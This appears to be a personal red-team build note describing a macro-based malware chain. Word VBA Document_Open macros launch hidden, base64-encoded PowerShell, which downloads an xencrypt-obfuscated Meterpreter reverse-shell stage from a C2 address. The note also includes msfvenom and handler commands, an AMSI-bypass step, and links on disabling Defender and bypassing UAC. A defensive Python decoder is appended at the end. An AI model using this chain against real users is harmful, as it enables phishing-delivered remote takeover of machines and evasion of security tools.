---
title: chimera building
tag: chimera
---

###### tags: `Chimera`

[TOC]

# chimera flow

Invoke PowerShell so that the shellcode is placed in memory and executed from there.

## A flow

- Start the msfconsole multi/handler listener
- Use Metasploit to generate the VBA code that invokes PowerShell

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f vba-psh > vba_psh.ps1
```

- Word VBA code

```=
Function h0jn6l4K9HOc()
    Dim ywi6v3
    ywi6v3 = "powershell.exe -nop -w hidden -e aQ...A" _
        & "cwBlAHs...4Ab" _
        & "wBwACAAL...yAGUAcwBzAGkAbw" _
        & "BuAC4ARwB6...YAVwBiAFcAKwB" _
        & "qAFIA...BIAFIAMgBFADcAdABp" _
        :
        :
        & "G0ALgBJA...QAYQBuAG" _
        & "QAYQByAG...AkAHM" _
        & "AKQA7AA=="
    Call Shell(ywi6v3, vbHide)
End Function

Sub Document_Open()
    h0jn6l4K9HOc
End Sub
```

> https://gist.github.com/mgeeky/9dee0ac86c65cdd9cb5a2f64cef51991

## B flow

- Start the msfconsole multi/handler listener
- Use Metasploit to generate the reverse-connection PowerShell script `pshell.ps1`

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f psh > pshell.ps1
```

- Obfuscate it with `xencrypt` to produce `chimera.ps1`, replace every `"` with `'`, and host the result on the C2 server

```=
Import-Module .\xencrypt.ps1
Invoke-Xencrypt -InFile C:\Users\astroicers\Desktop\chimera\pshell.ps1 -OutFile C:\Users\astroicers\Desktop\chimera\chimera.ps1
```

- Encode the command to be executed with PowerShell's base64 variant

```
IEX(New-Object Net.WebClient).DownloadString('http://192.168.100.155:8000/chimera.ps1');sleep 9999
```

- Substitute the encoded command for `{{base64_code}}` in the PowerShell script

```=
if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='-nop -w hidden -e {{base64_code}}';
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);
```

- Encode the script above again with PowerShell's base64 variant, split it into chunks, and put it in the VBA code (a VBA source line holds at most 1024 characters)

```=
Function h0jn6l4K9HOc()
    Dim ywi6v3
    ywi6v3 = "powershell.exe -nop -w hidden -e " _
        & "aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4" _
        & "AGUAJwB9ADsADQAKACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwANAAoAJABzAC4ARgBpAGwAZQBOAGEAbQBlAD0AJABiADsADQAKACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGUAIABTAFEAQgBGAEEA" _
        & "RgBnAEEASwBBAEIATwBBAEcAVQBBAGQAdwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAFQAZwBCAGwAQQBIAFEAQQBMAGcAQgBYAEEARwBVAEEAWQBnAEIARABBAEcAdwBBAGEAUQBCAGwAQQBHADQAQQBkAEEAQQBwAEEAQwA0AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBD" _
        & "AGcAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAZwBBAEwAZwBBAHgAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEAMQBBAEQAbwBBAE8AQQBBAHcAQQBEAEEAQQBNAEEAQQB2AEEARwBNAEEAYQBBAEIAcABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBMAGcAQgB3AEEASABNAEEATQBRAEEAbgBBAEMA" _
        & "awBBAE8AdwBCAHoAQQBHAHcAQQBaAFEAQgBsAEEASABBAEEASQBBAEEANQBBAEQAawBBAE8AUQBBADUAQQBBAD0APQAnADsADQAKACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwANAAoAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7AA0ACgAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBs" _
        & "AGUAPQAnAEgAaQBkAGQAZQBuACcAOwANAAoAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsADQAKACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA"
    Call Shell(ywi6v3, vbHide)
End Function

Sub Document_Open()
    h0jn6l4K9HOc
End Sub
```

## C flow

This version is essentially `B flow` with an AMSI-bypass mechanism added.

### kali

- msfconsole command

```=
use exploit/multi/handler
set encoder x64/xor_dynamic
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 7777
set ExitOnSession false
exploit -j -z
```

- C2 server (http)

```=
python3 -m http.server
```

- msfvenom command

```=
msfvenom --encoder x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f psh > pshell.ps1
```

- xencrypt

```shell=
Import-Module .\xencrypt.ps1
Invoke-Xencrypt -InFile C:\Users\astroicers\Desktop\chimera\pshell.ps1 -OutFile C:\Users\astroicers\Desktop\chimera\chimera.ps1
```

> https://github.com/the-xentropy/xencrypt

- Append `chimera.ps1` after `bypass_amsi.ps1`

```=
$Win32 = @"
using System;
...
using System.Runtime.InteropServices;
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, $Patch.Length)
```

> https://github.com/astroicers/ToolForHack/tree/main/powershell/bypass_amsi/dll_hijack

- Host the payload `chimera.ps1` on the C2 server

### windows

- The command to execute with PowerShell

```=
IEX(New-Object Net.WebClient).DownloadString('http://192.168.100.155:8000/chimera.ps1');sleep 9999
```

Encode it with [powershell base64](#powershell-base64-encodedecode):

```=
SQBFAFgA...A5ADkAOQA5AA==
```

```=
if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='-nop -w hidden -e SQBFAFgA...A5ADkAOQA5AA==';
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);
```

Encode it with [powershell base64](#powershell-base64-encodedecode):

```=
aQBmACgAWwBJ...DQAKAA==
```

- VBA code

> P.S. A single VBA line can only hold fewer than 1024 characters

```=
Function h0jn6l4K9H()
    Dim ywi6v3dd
    ywi6v3dd = "powershell.exe -nop -w hidden -e " _
        & "aQBmACgAWwBJ..." _
        & "..." _
        & "..." _
        & "..." _
        & "..." _
        & "...DQAKAA=="
    Call Shell(ywi6v3dd, vbHide)
End Function

Sub Document_Open()
    h0jn6l4K9H
End Sub
```

# setting

## macro setting

- Enable the Word [Developer] tab
- Open [Visual Basic]
- Edit the [Normal] block
- Use the [Document_Open()] function so the macro runs as soon as the document is opened

> https://wordmvp.com/FAQs/MacrosVBA/DocumentEvents.htm

## powershell setting

- Set the PowerShell execution policy so scripts can run

> https://hsiangfeng.github.io/other/20200510/1067127387/

- Create the ps1 script with Metasploit

```shell=
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=7777 -f psh > pshell.ps1
```

> https://netsec.ws/?p=331

- Obfuscate it with the open-source `xencrypt` project

```shell=
Import-Module .\xencrypt.ps1
Invoke-Xencrypt -InFile C:\Users\astroicers\Desktop\chimera\pshell.ps1 -OutFile C:\Users\astroicers\Desktop\chimera\chimera.ps1
```

> https://github.com/the-xentropy/xencrypt

## remote execute ps1 file

```shell=
IEX(New-Object Net.WebClient).DownloadString("http://192.168.100.155:8000/chimera.ps1")
powershell -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.100.155:8000/chimera.ps1');sleep 9999"
powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADAAMAAuADEANQA1ADoAOAAwADAAMAAvAGMAaABpAG0AZQByAGEALgBwAHMAMQAnACkAOwBzAGwAZQBlAHAAIAA5ADkAOQA5AA==
powershell -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADAAMAAuADEANQA1ADoAOAAwADAAMAAvAGMAaABpAG0AZQByAGEALgBwAHMAMQAnACkAOwBzAGwAZQBlAHAAIAA5ADkAOQA5AA==
```

## powershell base64 encode/decode

- https://raikia.com/tool-powershell-encoder/

## turn off windows defender

- [disable windows defender](https://www.itechtics.com/enable-disable-windows-defender/)
- [use kernel bug bypass uac](https://www.twblogs.net/a/5b8ec52f2b71771883479c36)
- [run powershell with admin](https://stackoverflow.com/questions/7690994/running-a-command-as-administrator-using-powershell)
- [powershell bypass uac](https://evi1cg.me/archives/Powershell_Bypass_UAC.html)
- [bypass uac](https://cloud.tencent.com/developer/article/1623517)
- [mimikatz win10 error](https://github.com/mitre/caldera/issues/38)

# refer

- [macro execute powershell by metasploit reverse http payload](https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack/empire-macro)
- [Various-Macro-Based-RCE](https://gist.github.com/mgeeky/9dee0ac86c65cdd9cb5a2f64cef51991)
- [create shell process](https://docs.microsoft.com/zh-tw/office/vba/access/concepts/windows-api/determine-when-a-shelled-process-ends)
- [PowerShell code obfuscation bypass](https://iter01.com/512458.html)
- [amsi bypass powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
- [enable PowerShell script execution on Windows](https://hsiangfeng.github.io/other/20200510/1067127387/)
- [bypass amsi dll](http://cn33liz.blogspot.com/2016/05/bypassing-amsi-using-powershell-5-dll.html)
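The layered launcher used throughout this note (a VBA string split across `_` continuation lines, handed to `Shell`, carrying `powershell -nop -w hidden -e` with a base64/UTF-16LE body that itself contains another `-e` layer and finally the `IEX(...).DownloadString(...)` cradle) is exactly what a blue team has to unpick when such a document lands in triage. The Python below is an added example, not code from the original note or from any of the linked projects: it reassembles the VBA string, peels the nested encoded layers, and reports the cradle and stealth indicators that detection rules key on. The macro it analyses is a constructed sample with a placeholder host (`c2.example.invalid`), and all function and indicator names are my own.

```python
import base64
import re

# Added example (not from the page): triage a macro-launched PowerShell command.
# Step 1: reassemble the "..." _ & "..." VBA continuation pieces.
# Step 2: peel -e/-EncodedCommand layers (base64 over UTF-16LE).
# Step 3: report the indicators a detection rule would key on.

MACRO_INDICATORS = {
    "auto_exec": re.compile(r"\b(?:Document_Open|AutoOpen|Auto_Open|Workbook_Open)\b", re.I),
    "shell_call": re.compile(r"\bShell\s*\(|WScript\.Shell|CreateObject\s*\(", re.I),
    "hidden_launch": re.compile(r"\bvbHide\b", re.I),
}

COMMAND_INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I),
    "inline_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden|CreateNoWindow\s*=\s*\$true", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
    "encoded_command": re.compile(r"-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}

ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RX = re.compile(r"""https?://[^\s'"()]+""", re.I)
VBA_STRING = re.compile(r'"((?:[^"]|"")*)"')       # one VBA string literal ("" escapes a quote)
SHELL_ARG = re.compile(r"\bShell\s*\(\s*(\w+)", re.I)  # variable passed to Shell(...)


def reassemble_vba_string(vba_text, var_name):
    """Join the quoted pieces of a multi-line VBA assignment to var_name."""
    pieces, collecting = [], False
    for line in vba_text.splitlines():
        s = line.strip()
        if not collecting:
            if not re.match(rf"{re.escape(var_name)}\s*=", s, re.I):
                continue
            collecting = True
        pieces.extend(VBA_STRING.findall(s))
        if not s.endswith("_"):          # no trailing continuation: statement ends here
            break
    return "".join(p.replace('""', '"') for p in pieces)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -e/-EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:                   # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_command(cmdline, max_layers=4):
    """Peel nested encoded layers and collect indicators/URLs across all of them."""
    layers, indicators, urls = [cmdline], set(), []
    while len(layers) < max_layers:
        decoded = decode_encoded_command(layers[-1])
        if decoded is None:
            break
        layers.append(decoded)
    for text in layers:
        indicators.update(n for n, rx in COMMAND_INDICATORS.items() if rx.search(text))
        urls.extend(URL_RX.findall(text))
    return {"layers": layers, "indicators": sorted(indicators), "urls": urls}


def triage_macro(vba_text):
    """Triage a VBA module: macro-level indicators plus the command handed to Shell()."""
    result = {"macro_indicators": sorted(n for n, rx in MACRO_INDICATORS.items() if rx.search(vba_text))}
    m = SHELL_ARG.search(vba_text)
    if m:
        result["command"] = triage_command(reassemble_vba_string(vba_text, m.group(1)))
    return result


def b64_utf16le(text):
    """The encoding PowerShell expects for -EncodedCommand: base64 over UTF-16LE."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


SAMPLE_URL = "http://c2.example.invalid:8000/stage.ps1"   # constructed placeholder, not a real host


def build_sample_macro():
    """Constructed three-layer sample in the shape of the macros above (test fixture only)."""
    inner = f"IEX(New-Object Net.WebClient).DownloadString('{SAMPLE_URL}');sleep 9999"
    middle = f"$s.Arguments='-nop -w hidden -e {b64_utf16le(inner)}';"
    outer = "powershell.exe -nop -w hidden -e " + b64_utf16le(middle)
    chunks = [outer[i:i + 60] for i in range(0, len(outer), 60)]
    body = " _\n        & ".join(f'"{c}"' for c in chunks)
    return ("Function launcher()\n    Dim cmd\n    cmd = " + body +
            "\n    Call Shell(cmd, vbHide)\nEnd Function\n\n"
            "Sub Document_Open()\n    launcher\nEnd Sub\n")


if __name__ == "__main__":
    import json
    print(json.dumps(triage_macro(build_sample_macro()), indent=2))
```

In practice the VBA text comes from a macro extractor such as olevba, and `triage_command` can equally be pointed at the command line recorded in Sysmon Event ID 1 or Windows Event ID 4688 when a Word process spawns `powershell.exe`; the `-nop -w hidden -e` combination together with a decoded `DownloadString`/`IEX` pair is the signal to alert on.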